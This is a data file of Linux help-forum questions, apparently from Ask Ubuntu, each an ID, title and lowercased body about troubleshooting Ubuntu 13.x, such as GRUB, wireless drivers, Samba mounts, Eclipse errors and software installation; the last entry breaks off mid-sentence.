380843	dejadup backup check time	i have the following problem : when i am in office where we have a nas to which dejadup should backup it never fires up . as soon as i am at home ( ironically , truely : sometimes when i work from home ) dejadup pops up and tells me it ca n't do a backup . if i do n't remember myself to make a backup when being in work it would backup almost never ... question : can i somehow define the time ( hour ) when dejadup should ask ( by showing an indicator message ) to start a backup ?
380844	intel-virtual-output command for saucy 13.10 with dual monitor setup and hybrid graphic	i want to configure/use a second display on my thinkpad w530 with intel/nvidia hybrid graphics . bumblebee from ubuntu ppa is installed . after hours on searching the web , i found a solution which uses a patched intel graphics driver with virtual screen and a little tool called screenclone . ( optimal ubuntu graphics setup for thinkpads ) but this solution is n't for 13.10 and i found out that the xserver-xorg-video-intel driver 2.99 has a tool for supporting virtual screens `` intel-virtual-output '' . the tool `` intel-virtual-output '' is n't build & distribute at this time . ( build and distribute intel-virtual-output ) i have tried to build and install the driver from source : apt-get build-dep xserver-xorg-video-intel git clone git : //anongit.freedesktop.org/xorg/driver/xf86-video-intel cd xf86-video-intel ./autogen.sh -- prefix=/usr make & & sudo make install but the version of package xserver-xorg-video-intel is n't change and the tool intel-virtual-output is n't available in terminal . the package on the xorg-edgers ppa also does n't include the tool for virtual screens . how can i install the tool `` intel-virtual-output '' ? thanks in advance and excuse my bad english .
380845	custom folder locations for java & wine programs	i have customised the default folder locations for documents , downloads , pictures , etc by modifying the ~/.config/user-dirs.dirs . i use a separate ntfs partition to be able to use the same folders on windows ( dual boot ) . this works well for most programs . unfortunately java and wine programs do not recognise these folders and each time i save a new file , i have to navigate to the documents folder starting from root . in the past i used symlinks in my home folder to get around this annoyance . is there a way to set up these custom folder locations for java and wine programs without placing symlinks in my home folder ?
380846	how can i remove a hdd from the `` devices '' list in the file browser ?	i 'm running ubuntu 13.10 on a new 11,3 macbook pro ( dual booting ) and i see this random hdd ( looks like my cryptswap partition ) listed under devices in my file browser . as you can see it 's a bit of an eyesore and i ca n't even access it : how can i remove this from this list ?
380847	is it possible to translate words via terminal ?	i would like to translate words from english to language x trough terminal if it is possible , what kind of dictionaries there are ? is it possible to use online services like webxicon.org trough terminal ?
380848	instalation process	i installed ubuntu 13.10 & 13.04 several times using the option eraser all disk and install ubuntu . and after installation process finished , i restarted pc and it said boot device not found , please install an operating system . i tried installing first windows and when i start ubuntu installation wizard , it said no operating system detected . i do n't see the windows partition , but only a complete empty disk .
380849	black screen installing ubuntu 12.04 on hp pavilion g6	i m trying to install ubuntu 12.04 on my hp pavilion g6 via live usb using unetbootin , but after selecting my flash to boot from , if i select try ubuntu without installing or install ubuntu on the live usb menu the screen of my laptop turns black . please , can anyone knows what s happening here and how can i overcome this problem ?
380850	i deleted ubuntu and now my laptop is unusable . can anyone help please ?	i removed ubuntu desktop using os-uninstaller , and wanted to put win 8 back on my laptop . i was n't dual booting- i installed ubuntu directly over win 8 . now my laptop wo n't do anything . i boot it , and it just shows a blank screen and i can hear the hdd working . i 've plugged in an external dvd drive ( no built in optical drive ) , and i ca n't boot from that using a win 8 disc , and it wo n't even recognise my ubuntu disc ( i 've tried cd and bootable usb thumbdrive which does n't even light up when plugged in now ) . any ideas what i can try to make this laptop usable again please ? i ca n't access bios or anything .
380851	why is the default nsswitch.conf file so broken ?	this is the default line in nsswitch.conf that is so badly broken hosts : files mdns4_minimal [ notfound=return ] dns mdns4 we have a network and we have people working on vpns . the above adds a 5 second delay ( in house ) to every host resolve and/or breaks everyone on the vpn when you have a mixed os network we have to change that line to : hosts : files dns mdns4 on every machine , every time . why ? what is the purpose of delivering a crippled solution in a place that most people do n't even know to look ? it wo n't break things where the search domain is different because that ends up doing a real dns lookup , but on our vpn , our search domain is the same in office as out , and this is just completely broken . someone , somewhere must have some reason for doing this , i just ca n't for the life of me figure out what it could be .
380852	how to mount a windows ce share	i 'm trying to mount a windows ce share but am having some issues . the mount seems to happen , but then i ca n't see the shared drives contents . it seems to work with windows 7 . the windows 7 share : bill @ fibuntu : /mnt $ smbclient -l //10.5.101.185 enter bill 's password : domain= [ fiberio-bill ] os= [ windows 7 professional 7601 service pack 1 ] server= [ windows 7 professional 6.1 ] sharename type comment -- -- -- -- - -- -- -- -- -- - admin $ disk remote admin c $ disk default share d $ disk default share ipc $ ipc remote ipc users disk session request to 10.5.101.185 failed ( called name not > present ) session request to 10 failed ( called name not present ) session request to *smbserver failed ( called name not present ) netbios over tcp disabled -- no workgroup available ... and mounting it : bill @ fibuntu : /mnt $ sudo mount -t cifs -o guest , sec=none , uid=bill , gid=bill , file_mode=0755 , dir_mode=0755 //10.5.101.185/user /mnt/test bill @ fibuntu : /mnt $ ls -la test total 9 drwxr-xr-x 2 bill bill 4096 nov 21 09:44 . drwxr-xr-x 4 root root 4096 nov 22 09:14 .. dr-xr-xr-x 0 bill bill 0 jul 14 2009 default -rwxr-xr-x 0 bill bill 174 jul 13 2009 desktop.ini bill @ fibuntu : /mnt $ sudo umount test the windows ce share : bill @ fibuntu : /mnt $ smbclient -l //192.168.120.21 enter bill's password : domain= [ hmi ] os= [ windows ce ] server= [ windows ce ] sharename type comment -- -- -- -- - -- -- -- -- -- - vfs disk internal disk ipc $ ipc remote inter process communication session request to 192.168.120.21 failed ( called name not present ) session request to 192 failed ( called name not present ) session request to *smbserver failed ( called name not present ) netbios over tcp disabled -- no workgroup available bill @ fibuntu : /mnt $ sudo mount -t cifs -o guest , sec=none , uid=bill , gid=bill , file_mode=0755 , dir_mode=0755 //192.168.120.21/internal /mnt/test bill @ fibuntu : /mnt $ ll test ls : reading directory test : operation not supported total 0
380854	can i change the grub default choice from windows ?	this is a weird question . i read how to set the default os choice for grub ( how do i set the grub timeout and the grub default boot entry ? ) and i did that , but since i often work from home , i 'd like to switch from windows 7 to ubuntu 13 and from ubuntu 13 to windows 7 automatically by vnc . i can edit manually the file /etc/default/grub , but i ca n't do the sudo update-grub from inside the windows environment . my question is : is there any way to do this from inside a windows environment or to use a workaround to be able to change the default bootloader choice and boot into another operating system remotely ? this has been asked but nobody answered ( change grub default from windows )
380856	share 13.10 & win 8 cpu 's on home network ?	i have a home network that shares folders between two win 8 systems . i can not get a connection between win systems and my ubuntu 13.10 system but the win systems connect to each other . this is a wireless network . suggestions on what to look for ? -- -11/15 tried new workgroup , i can see the win pc now but it will not connect ( details below ) .
380857	when i start eclipse 4.3 i get `` invalid configuration location '' error	when i first installed eclipse 4.3 ( kepler ) it ran a-okay . i even did a java program . when i shut down eclipse and ran it again later , i got the error message below . thinking i did something wrong on the install , i uninstalled it and removed all traces of eclipse . then i reinstalled it , ran eclipse and all was great . it ran normally for a couple days . then i shut down the computer and restarted it a few hours later . eclipse gave that same error message again , the invalid configuration location error . so something goes awry after the initial running of eclipse and prevents further executions of the program . this error message is generated when i run eclipse ( kepler ) in kubuntu 13.10 . it shows up right after the eclipse splash screen disappears : **invalid configuration location** locking is not possible in the directory `` /opt/eclipse/configuration/org.eclipse.osgi '' . a common reason is that the file system or runtime environment does not support file locking for that location . please choose a different location , or disable file locking passing `` -dosgi.locking=none '' as a vm argument . permission denied so i did the disabling suggestion and put it right after the vmargs line . here 's the current ini file for eclipse 4.3 ( kepler ) -startup plugins/org.eclipse.equinox.launcher_1.3.0.v20130327-1440.jar -- launcher.library plugins/org.eclipse.equinox.launcher.gtk.linux.x86_64_1.1.200.v20130807-1835 -product org.eclipse.epp.package.java.product -- launcher.defaultaction openfile -showsplash org.eclipse.platform -- launcher.xxmaxpermsize 256m -- launcher.defaultaction openfile -- launcher.appendvmargs -vmargs -dosgi.locking=none -dosgi.requiredjavaversion=1.6 -xx : maxpermsize=256m -xms40m -xmx512m but still i get the same identical message . the arg -dosgi.locking=none is working as evidenced by the fact that the log file in the configuration folder no longer mentions file locking as a problem . here is what i get now in the configuration log , the latest : ! session 2013-11-22 22:25:06.162 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=4.3.0.m20130911-1000 java.version=1.7.0_45 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86_64 , ws=gtk , nl=en_us framework arguments : -product org.eclipse.epp.package.java.product command-line arguments : -os linux -ws gtk -arch x86_64 -product org.eclipse.epp.package.java.product ! entry org.eclipse.osgi 4 0 2013-11-22 22:25:14.821 ! message error reading configuration : permission denied ! stack 0 java.io.ioexception : permission denied at java.io.unixfilesystem.createfileexclusively ( native method ) at java.io.file.createnewfile ( file.java:1006 ) at java.io.file.createtempfile ( file.java:1989 ) at org.eclipse.osgi.storagemanager.storagemanager.initializeinstancefile ( storagemanager.java:188 ) at org.eclipse.osgi.storagemanager.storagemanager.open ( storagemanager.java:708 ) at org.eclipse.osgi.internal.baseadaptor.basestorage.initfilemanager ( basestorage.java:226 ) at org.eclipse.osgi.internal.baseadaptor.basestorage.initialize ( basestorage.java:160 ) at org.eclipse.osgi.baseadaptor.baseadaptor.initializestorage ( baseadaptor.java:123 ) at org.eclipse.osgi.framework.internal.core.framework. < init > ( framework.java:192 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.startup ( eclipsestarter.java:263 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:177 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:606 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:636 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:591 ) at org.eclipse.equinox.launcher.main.run ( main.java:1450 ) at org.eclipse.equinox.launcher.main.main ( main.java:1426 ) ! entry org.eclipse.osgi 4 0 2013-11-22 22:25:14.869 ! message startup error ! stack 1 java.lang.runtimeexception : permission denied at org.eclipse.osgi.framework.internal.core.framework. < init > ( framework.java:194 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.startup ( eclipsestarter.java:263 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:177 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:606 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:636 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:591 ) at org.eclipse.equinox.launcher.main.run ( main.java:1450 ) at org.eclipse.equinox.launcher.main.main ( main.java:1426 ) caused by : java.io.ioexception : permission denied at java.io.unixfilesystem.createfileexclusively ( native method ) at java.io.file.createnewfile ( file.java:1006 ) at java.io.file.createtempfile ( file.java:1989 ) at org.eclipse.osgi.storagemanager.storagemanager.initializeinstancefile ( storagemanager.java:188 ) at org.eclipse.osgi.storagemanager.storagemanager.open ( storagemanager.java:708 ) at org.eclipse.osgi.internal.baseadaptor.basestorage.initfilemanager ( basestorage.java:226 ) at org.eclipse.osgi.internal.baseadaptor.basestorage.initialize ( basestorage.java:160 ) at org.eclipse.osgi.baseadaptor.baseadaptor.initializestorage ( baseadaptor.java:123 ) at org.eclipse.osgi.framework.internal.core.framework. < init > ( framework.java:192 ) ... 10 more so , the one remaining option is to move the configuration . or maybe use -vm to specify a path or maybe pass an arg to the vm ? i used the guide to do the install of eclipse located at : http : //tutorialforlinux.com/2013/09/27/how-to-install-eclipse-ide-for-java-developers-ubuntu-13-04-raring13-10-saucy/ what 's likely to work ?
380859	wlan device disappear ( bcm43142 )	$ cat /etc/*release* | grep -i distrib distrib_id=ubuntu distrib_release=13.10 distrib_codename=saucy distrib_description= '' ubuntu 13.10 '' $ lspci | grep -i bcm 02:00.0 network controller : broadcom corporation bcm43142 802.11b/g/n ( rev 01 ) $ lshw -c network *-network description : network controller product : bcm43142 802.11b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=bcma-pci-bridge latency=0 resources : irq:16 memory : f1900000-f1907fff $ lsmod | grep -i bcma bcma 46670 0 $ rfkill list 0 : hci0 : bluetooth soft blocked : no hard blocked : no $ dmesg | grep -i wlan $ ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:374 errors:0 dropped:0 overruns:0 frame:0 tx packets:374 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:40211 ( 40.2 kb ) tx bytes:40211 ( 40.2 kb ) seems like the module for the wifi is not loaded ( or loaded incorrectly ) . i will appreciate if one could shed the light on the issue and assist bringing the wifi up again . also tried $ rmmod bcma $ modprobe bcma but it did not help update : i did the following and it seems to help . can it be ? $ apt-get install bcmwl-kernel-source
380862	how to use citrix , open .ica file	i have to be able to use citrix for my work and i can not get it to work . it always wants to `` open '' the .ica file . i have tried to do what is said on the web but have had no luck .
380865	webcam toshiba satellite a305-s6825 not working on ubuntu 13.10	i recently installed ubuntu 13.10 and webcam is missing i tried cheese but it did n't work out my laptop is toshiba satellite a305-s6825 and this is the output of lsusb bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub
380866	vaprofileh264baseline with nvs 5400m	i observed on my config that my nvidia driver does n't support the h264 baseline decoding , and i really this . what can i do to resolve this ? i 'm very surprise that main and advanced are supported and no the baseline . vainfo : libva : va-api version 0.32.0 xlib : extension `` xfree86-dri '' missing on display `` :0 '' . libva : va_getdrivername ( ) returns 0 libva : trying to open /usr/lib/x86_64-linux-gnu/dri/nvidia_drv_video.so libva : va_opendriver ( ) returns 0 vainfo : va-api version : 0.32 ( libva 1.0.15 ) vainfo : driver version : splitted-desktop systems vdpau backend for va-api - 0.7.3 vainfo : supported profile and entrypoints vaprofilempeg2simple : vaentrypointvld vaprofilempeg2main : vaentrypointvld vaprofilempeg4simple : vaentrypointvld vaprofilempeg4advancedsimple : vaentrypointvld vaprofileh264main : vaentrypointvld vaprofileh264high : vaentrypointvld vaprofilevc1simple : vaentrypointvld vaprofilevc1main : vaentrypointvld vaprofilevc1advanced : vaentrypointvld vdpauinfo ( part ) display : :0 screen : 0 api version : 1 information string : nvidia vdpau driver shared library 319.32 wed jun 19 14:58:31 pdt 2013 video surface : name width height types -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 420 4096 4096 nv12 yv12 422 4096 4096 uyvy yuyv decoder capabilities : name level macbs width height -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - mpeg1 0 8192 2048 2048 mpeg2_simple 3 8192 2048 2048 mpeg2_main 3 8192 2048 2048 h264_main 41 8192 2048 2048 h264_high 41 8192 2048 2048 vc1_simple 1 8190 2048 2048 vc1_main 2 8190 2048 2048 vc1_advanced 4 8190 2048 2048 mpeg4_part2_sp 3 8192 2048 2048 mpeg4_part2_asp 5 8192 2048 2048 divx4_qmobile 0 8192 2048 2048 divx4_mobile 0 8192 2048 2048 divx4_home_theater 0 8192 2048 2048 divx4_hd_1080p 0 8192 2048 2048 divx5_qmobile 0 8192 2048 2048 divx5_mobile 0 8192 2048 2048 divx5_home_theater 0 8192 2048 2048 divx5_hd_1080p 0 8192 2048 2048
380871	internet stream keeps buffering	i 'm trying to see an streamed event . no matter what browser/media player i use , after 10 or 15 seconds the stream stops and keeps buffering ... if i pause it and play again , it plays another 10 or 15 seconds and so on ... at the same time ( the same pc ) , using virtualbox and running chromium in an xp image , the stream shows without problems ... anybody ? ubuntu 13.10 i7 - 12gb memory 6mb internet
380875	loop terminal command for combining png to gif animation	i am trying to combine some png images to make a gif animation . to do this i have installed imagemagic and am trying to execute the command : convert -delay 10 -loop 0 inputfiles*.png animaion.gif i have a lot of image files that i am trying to combine so i do n't really want to type them all out individually , is there anyway i can execute this command as some sort of loop , or alternatively a better method of creating an animation from these images ? i have written a program to output all the file names so i can just copy and paste them into the terminal , this works but if anyone knows a better way to do this it would be helpful . thanks
380877	iphone 4s with ios7 unable to connect .	i am using ubuntu 12.04 lts and when i try to connect my iphone i get the following message . the device 'mithun 's iphone ' is locked . enter the passcode on the device and click 'try again ' . i get this despite the iphone unlocked . i also get a message on my phone asking `` trust this computer ? `` which keeps repeating even after selecting trust . along with the above message i also get unable to mount mithun 's iphone dbus error org.freedesktop , dbus.error.noreply : message did not receive a reply ( timeout by message bus ) please help me out . thanks , mithun
380879	ubuntu - destroyed my data on longside installation - data recovery ?	i wanted to get ubuntu 13.10 so i downloaded it ... . firstly i tried to install it alongside my windows 7 ultimate 64-bit , using wubi . it did n't worked : no root filesystem error on ubuntu boot so i used my flash drive to boot ubuntu and start alongside installation on 20gb partition on my ssd just for that ... . but after all , my windows 7 and all my data was lost . ubutnu was transfered my ssd drive from mbr to efi gpt and formated it as ext4 . i lost minecraft server world saves , thousands lines of my php and python scripts , few gamesaves , a lot of text files witth important infos ... . about 1gb of data ... i still ca n't understand , why the fu*k ubuntu is had to touch disk mbr ? ! now i trying to recover my data , and i do not known how , because i got much raw and damaged data ... ... .. is there any good program for that except few ones i tried : minitool , easeus , getdataback , icare , recuva ? every of these programs returns me raw data , and just most recent .ext types for example .rar .zip .jpg .gif .png ? i need to recover .php .css .dat .sav .c .bin .mb2 .mca .spm .pl .py how i can get that done ? thanks in advance for any help !
380881	cpu frequency scaling on ubuntu and windows	linux reports my cpu 's maximum frequency as 2.40 ghz and min as 1.2 ghz . windows 8 's task manager shows the cpu frequency going above 3.0 ghz or below 1.0 ghz on occasion , according to usage . this is something i have noticed in 12.10 , 13.04 , and 13.10 , as well as arch linux . i have a 3rd-gen corei7-3630qm cpu @ 2.40 ghz , according to lshw -c cpu . anybody know how windows gets to the larger range of frequencies ? what will happen if i force set the maximum and minimums to more extreme values , by doing something like : for file in /sys/devices/system/cpu/cpu*/cpufreq/scaling_max_freq do echo 3001000 > $ file done right now the exact maximum frequency in all /sys/devices/system/cpu/cpu*/cpufreq/scaling_max_freq files is 2401000 .
380882	how to dual boot osx and ubuntu without having to delete and reinstall ubuntu in a dell laptop ?	i am trying to install osx lion on my dell studio with ubuntu being the current and only operating system . is there a way to dual boot without having to delete and reinstall ubuntu ?
380887	ubuntu 13.10 black screen ( ca n't login )	hi i 've just installed ubuntu on my second hdd , everything went perfect but when i boot up the pc from that hdd and then select ubuntu on grub 's menu , the login screen 's music sounds but the screen is black , even the monitor goes to power save mode . i have been trying to use boot-repair and all other things but it always turns up the same way : black screen at login i also tried to switch between non-graphical consoles but nothing changes , still black screen . thanks in advance .
380888	dmesg gives pm-timer bug	command dmesg on my pc gives e.g . following : [ 0.123440 ] pci 0000:00:1f.0 : [ 8086:24c0 ] type 0 class 0x000601 [ 0.123446 ] * the chipset may have pm-timer bug . due to workarounds for a bug , [ 0.123447 ] * this clock source is slow . if you are sure your timer does not have [ 0.123449 ] * this bug , please use `` acpi_pm_good '' to disable the workaround [ 0.123544 ] pci 0000:00:1f.1 : [ 8086:24cb ] type 0 class 0x000101 what does it mean ? chipset is an old intel 845gl/gv / intel速 ich4
380889	sublime text 2 broken package	whenever i try executing sublime text 2 from my terminal by typing sublime-text , it give the following : /usr/bin/sublime-text : line 3 : /opt/sublime_text_2/sublime_text : no such file or directory moreover , there are two icons in the menu , none of which work . these are the following things i tried : autoremove reinstallation apt-get upgrade but none of these seem to work . what should i do ?
380897	bluetooth support for asus z87i-deluxe motherboard ( wifigo module )	i bought an asus z87i-deluxe motherboard in september and have had some issues with the drivers which asus does only provide for windows . the motherboard has a wireless and bluetooth module as well as an alc1150 audio module https : //www.asus.com/us/motherboards/z87ideluxe # specifications i first installed the system with 13.04 and could not get either wifi or bluetooth to work . i had found a hack allowing me to install the windows drivers for the wifi and that worked but not for bluetooth . upgrade to 13٫10 broke everything so i did a clean install . not sure if thats new but my wireless card was now present in `` software and updates '' `` additional drivers '' listed under '' broadcom corporation : bcm4352 802٫11ac wireless network adapter . it was disabled by default but all i had to do was select `` using broadcom 802٫11 linux sta wireless driver source from bcmwl-kernel-source and that enabled my wireless to work . but i still can not get bluetooth to work . no module is detected . i am not sure if the bluetooth module is part of the bcm4352 http : //www.broadcom.com/products/wireless-lan/802.11-wireless-lan-solutions/bcm4352 i did some research and ran some debugging commands $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no $ lspci 00:00.0 host bridge : intel corporation 4th gen core processor dram controller ( rev 06 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v3/4th gen core processor pci express x16 controller ( rev 06 ) 00:02.0 vga compatible controller : intel corporation xeon e3-1200 v3/4th gen core processor integrated graphics controller ( rev 06 ) 00:03.0 audio device : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller ( rev 06 ) 00:14.0 usb controller : intel corporation 8 series/c220 series chipset family usb xhci ( rev 05 ) 00:16.0 communication controller : intel corporation 8 series/c220 series chipset family mei controller # 1 ( rev 04 ) 00:19.0 ethernet controller : intel corporation ethernet connection i217-v ( rev 05 ) 00:1a.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 8 series/c220 series chipset high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 1 ( rev d5 ) 00:1c.3 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 4 ( rev d5 ) 00:1c.4 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 5 ( rev d5 ) 00:1d.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation z87 express lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 8 series/c220 series chipset family 6-port sata controller 1 [ ahci mode ] ( rev 05 ) 00:1f.3 smbus : intel corporation 8 series/c220 series chipset family smbus controller ( rev 05 ) 03:00.0 network controller : broadcom corporation bcm4352 802.11ac wireless network adapter ( rev 03 ) 04:00.0 usb controller : asmedia technology inc. device 1142 but i honestly dont know where to go from there . i installed blueman bluetooth manager and it could not find any bluetooth device either . most of the research i did , people had connection issues but were mostly able to find their device . on another topic , ubuntu detects the sound module as 2.1 rather than the 8 channels it really has and i can not change that . this is lower priority for me but if you have an idea i would appreciate it . i appreciate any help you guys can give me
380898	how to open techniclauncher.jar in ubuntu	i am completely new to ubuntu . just got it installed on my laptop yesterday as the windows program crashed and this is the only thing we could get to work . i have downloaded techniclauncher on the computer and it saves it as a .jar file . i have no idea how to get it opened/downloaded/launched ( whatever the correct word is ) so that we can actually play the game . can someone please help me learn how to do this . again i am completely new and do not understand all the ubuntu terminology but i am computer literate and can generally be told specifics and get it done . thank you so much
380902	how to fix bluetooth not working on hp pavilion 15	first of all , im new to ubuntu.i installed ubuntu 12.04.1 lts the icon says bluetooth is on , but there are n't any options and in bluetooth settings it says it 's disabled . please help.. !
380903	**child process error**	i am on ubuntu 13.10 and scanning with xsane 0.998 and kodak esp 3200 series aio:002 and when i try to send a fax i get the error child process error failed to execute fax command : send fax : no such file directory . does anyone know the steps for faxing ? i am very new to linux and need gentle help please .
380905	dual boot with linux after deletion : grub rescue	i dual booted my computer which originally had windows 7 installed on it , with backtrack 5 r3 . i went through the install process perfectly and bt was working very well . i then restarted my system and booted up into windows . i went into disk management , because i was curious about what partition bt was installed on , and by mistake i deleted the partition that it was installed on . i thought there was nothing on this partition and was really stupid not to check how much space had been used on the drive . anyways , i restarted my computer and came up to the screen that says : '' error : unknown file system grub rescue > ! ! ! ! ! ! this is easy to fix , i had it once before with linux mint . i just repaired the boot loader with my windows 7 recovery disk . however , this time it is not as simple . i cant boot into any cds/dvds , including my windows 7 disk and backtrack , even though my first boot device is set to internal cd rom . the problem is that when i boot up my computer , i can not access my bios . no onscreen keys r shown ( the usual f2 on my lg laptop ) . i have tried all key combinations incase it had switched my bios key , which is very unlikely , but it was worth a shot . it just takes me straight to the grub rescue prompt where i can virtually do nothing . i , ve tried ls at the rescue and tried to boot up into one of the hard disks , help commands and any other obvious commands that i thought might work , but nothing ! i cant remember off-hand all the model numbers , but my laptop is an lg , as i mentioned above and have a toshiba hdd . anything else you need to know ? how can i fix this ?
380908	ubuntu hangs after grub while installation	my computer was working fine . i installed unetbooting and i wanted to installed windows 7 to my usb . so i opened unetboot and my usb was formated to fat 32 and selected the windows 7 iso with my usb . then i restarted my laptop with the usb plunged in . unetboot showed up but there was no iso to select so i just switched off my computer by holding the hardware boot button . and then restarted my computer . grub loaded and allowed me to make my selection but when i clicked ubuntu it would stay on the black terminal thing and wo n't boot . i tried the recovery but that wo n't load either . my windows vista loads up fine but ubuntu does n't how can i fix this ?
380911	installing printer hangs 13.04 : public key is not available:	i am trying to install a printer . i go to system settings select printer . i successfully search for and find my printer by using its ip address . once i get to the point it choosing whether i want a driver from gutenprint or local driver i chose gutenprint the first time and although it said it was 'installing driver gutenprint ' asked my password but never completed . i also hangs when selecting 'local driver ' . i have also noticed the following error when running apt-get update : reading package lists ... done w : gpg error : http : //www.openprinting.org lsb3.1 release : the following signatures could n't be verified because the public key is not available : no_pubkey 7a4b44c2d2a2203e i did try apt-get -f install as suggested in another thread but it made no difference . has anyone got any ideas that will stop me from having to re-install ubuntu ?
380913	how to install scilab ?	as a summary : i wanted to install the latest scilab , which is not available in the software centre . i downloaded the tar.gz file from the website . i then followed the instructions from response 7 here how to install a .tar.gz ( or .tar.bz2 ) file ? . this did n't work for me . so i removed the file ( i think ) , and extracted the file a different way and ran the program from there . okay , so i downloaded scilab from their website as a tar.gz file . i then copied the file to /opt : sudo cp [ download name ] .tar.gz /opt/ i then extraced the file and deleted the tar.gz file : sudo tar -xvf [ download name ] .tar.gz sudo rm -rf [ download name ] .tar.gz i found the folder . it was called scilab-5.4.1 . i think the next step changes the `` access '' settings , and so i changed it as follows : sudo chmod 770 scilab-5.4.1/ so this is owner and group permission to read , write and execute . i then tried the symbolic link thing : sudo ln -s /opt/scilab-5.4.1/ /usr/bin/scilab after this , i tried different ways to run the programme from the terminal , but to no avail . i then looked for the scilab folder , which i found in opt . i tried to delete the folder `` windows-style '' ( send to recycling bin ) but it would n't let me . i also tried purge from the terminal but it could n't find the programme . i then used : sudo rm -r /opt/scilab-5.4.1 the folder disappeared . after this , i downloaded the file again , and transferred it to opt in the process : sudo tar xzvf [ download name ] .tar.gz -c /opt/ i then went to the folder ( in terminal ) : cd /opt/scilab-5.4.1 and opened scilab : ./bin/scilab this seems to work . however , there is a scilab programme logo in the launcher ( unity ) , but it disappears on closing the programme and there is no logo in the recently used programmes section in the dash . i want to know that was there an error in my installing process done in the previous unsuccessful install , since i ca n't find the scilab logo anywhere ? why first method did n't work but the second , simpler method , seemed to work okay ( i can at least open the programme ) ? ( the final peculiar thing is my `` history '' in the terminal : using the up-arrow to navigate to previous commands , the history suggests i did n't use rm -r , even though i am almost certain i did . )
380914	abnormal shutdown of unity	sometimes , when i shutdown or reboot , my laptop hangs on the purple screen with the white dots . it only behaves this was sometimes , not every time . how should i troubleshoot this ?
380916	computer won´t run after upgrading to13.10	i just upgraded from 13.04 to 13.10 , and after the upgrade was done and the computer started rebooting it just didn´t . it freezes after the bios screen . i have tried with `` super grub disk '' and `` boot repair '' , both beeing burnt in a cd and after switching the boot preference to cds , but the computer doesn´t read them . any help would be appreciated .
380921	login spins up unused and unmounted harddisk	i have two disks in my notebook , one ssd and a hdd . the hdd is not used ( and not mounted ) with ubuntu . per default the hdd was always active ( spinning ) with ubuntu 13.10 . so i added `` hdparm -y /sda '' to rc.local and it spins down on boot now and it keeps in standby - but only until i login to the desktop . why is that ? the disk is not used and not mounted . anybody knows why it spins up on login , maybe how to avoid this ?
380922	ubuntu-desktop : unmet dependencies	i tried to install gnome on ubuntu 13.04 using these guide ( http : //www.omgubuntu.co.uk/2013/04/gnome-3-8-ppa-for-ubuntu-gnome ) . it did n't work very well ( there were some glitches ) , so i tried uninstall it . i followed the instructions , but when i went back to unity it was `` ugly '' and i could n't see the desktop ( i had files there , but they were n't shown ) . i reinstalled gnome again , and purge everything again , and i think i also uninstalled ubuntu-deskop ( following advice from another page ) now unity is more or less ok , but i ca n't still see my desktop , and some programs like evince are lost . if i try to sudo apt-get install ubuntu-desktop i get reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ubuntu-desktop : depends : evince but it is not going to be installed depends : gnome-control-center but it is not going to be installed depends : seahorse but it is not going to be installed depends : software-center but it is not going to be installed recommends : deja-dup-backend-ubuntuone but it is not going to be installed recommends : empathy but it is not going to be installed recommends : gnome-control-center-unity but it is not going to be installed recommends : thunderbird-gnome-support but it is not going to be installed recommends : ubuntuone-client-gnome but it is not going to be installed recommends : ubuntuone-control-panel-qt but it is not going to be installed recommends : xul-ext-webaccounts but it is not going to be installed e : unable to correct problems , you have held broken packages . and i can not install , for example , evince , because i get : daniel @ daniel-linux : ~ $ sudo apt-get install evince reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have 